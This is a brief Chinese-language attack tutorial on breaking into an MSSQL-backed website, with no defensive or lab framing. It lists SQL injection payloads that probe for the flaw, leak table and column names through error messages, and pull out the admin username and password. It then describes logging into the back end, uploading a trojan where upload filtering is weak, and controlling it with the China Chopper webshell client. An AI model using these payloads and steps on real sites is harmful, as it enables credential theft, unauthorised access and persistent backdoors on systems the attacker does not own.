MSSQL注入之木马上传拿webshell

1.检测是否存在注入点：依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点

2.利用语句：a' having 1=1--爆出表名和字段名AdminUser.AdminId

3.接着爆出其他字段：

a' group by adminuser.adminid having 1=1--  //爆出用户名字段

a' group by adminuser.adminid,adminuser.username having 1=1-- //爆出密码字段

4.爆用户名和密码：

' and (select top 1 adminuser.username from adminuser)>0 //爆用户名

' and (select top 1 adminuser.password from adminuser)>0 //爆密码

5.用猜出的用户名和密码登录后台

6.查找可以上传的地方，上传本地木马文件（如果过滤不严，可以直接上传），记录木马的路径

7.使用中国菜刀连接木马，拿到webshell